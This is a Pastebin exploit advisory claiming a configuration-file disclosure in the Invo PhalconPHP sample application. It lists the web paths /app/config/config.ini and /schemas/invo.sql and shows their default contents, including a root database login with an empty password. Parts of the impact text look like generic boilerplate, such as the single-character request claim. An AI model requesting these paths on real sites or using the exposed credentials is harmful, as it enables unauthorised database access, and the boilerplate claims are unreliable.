KingSkrupellos

İnvo PhalconPHP 1.x Database Config Disclosure

Feb 13th, 2019
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.16 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : İnvo PhalconPHP 1.x Database Config Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 14/02/2019
  7. # Vendor Homepage : phalconphp.com
  8. # Software Download Link : github.com/phalcon/invo/archive/master.zip
  9. # Software Information Link : invo.phalconphp.com
  10. # Software Affected Version : Free Version and 1.x
  11. # Software Technical Requirements :
  12. PHP => 5.4 and MySQL => 5.1.5
  13. Apache Web Server with mod_rewrite enabled or Nginx Web Server
  14. # Tested On : Windows and Linux
  15. # Category : WebApps
  16. # Exploit Risk : Medium
  17. # Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. Phalcon PHP is a web framework delivered as a C extension providing
  27.  
  28. high performance and lower resource consumption.
  29.  
  30. ####################################################################
  31.  
  32. # Impact :
  33. ***********
  34. Invo PhalconPHP configuration file may potentially disclose sensitive information to remote attackers.
  35.  
  36. The configuration file that Invo PhalconPHP stored in /app/config/config.ini and /schemas/invo.sql
  37.  
  38. HTTP requests consisting of a single character will cause the software to
  39.  
  40. disclose sensitive configuration information, including the password/database to the administrative web interface.
  41.  
  42. This file is installed, by default, with world readable and possibly world writeable permissions enabled.
  43.  
  44. This may have some potentially serious consequences as the configuration
  45.  
  46. file also stores password information in plain text.
  47.  
  48. This issue occurs because access controls on configuration files are not properly set.
  49.  
  50. An attacker can exploit this issue to retrieve potentially sensitive information.
  51.  
  52. Attackers can access config file via URL request. This may aid in further attacks.
  53.  
  54. ####################################################################
  55.  
  56. # Database Configuration File Disclosure Exploit :
  57. *******************************************
  58. /app/config/config.ini
  59.  
  60. [database]
  61. adapter = Mysql
  62. host = localhost
  63. username = root
  64. password =
  65. dbname = invo
  66. charset = utf8
  67.  
  68. [application]
  69. controllersDir = app/controllers/
  70. modelsDir = app/models/
  71. viewsDir = app/views/
  72. pluginsDir = app/plugins/
  73. formsDir = app/forms/
  74. libraryDir = app/library/
  75. baseUri = /
  76.  
  77. # Database Disclosure Exploit :
  78. ***************************
  79. /schemas/invo.sql
  80.  
  81. -- MySQL dump 10.13 Distrib 5.1.50, for apple-darwin10.4.0 (i386)
  82. --
  83. -- Host: 127.0.0.1 Database: invo
  84. -- ------------------------------------------------------
  85. -- Server version 5.1.50
  86.  
  87. ####################################################################
  88.  
  89. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  90.  
  91. ####################################################################
Add Comment
Please, Sign In to add comment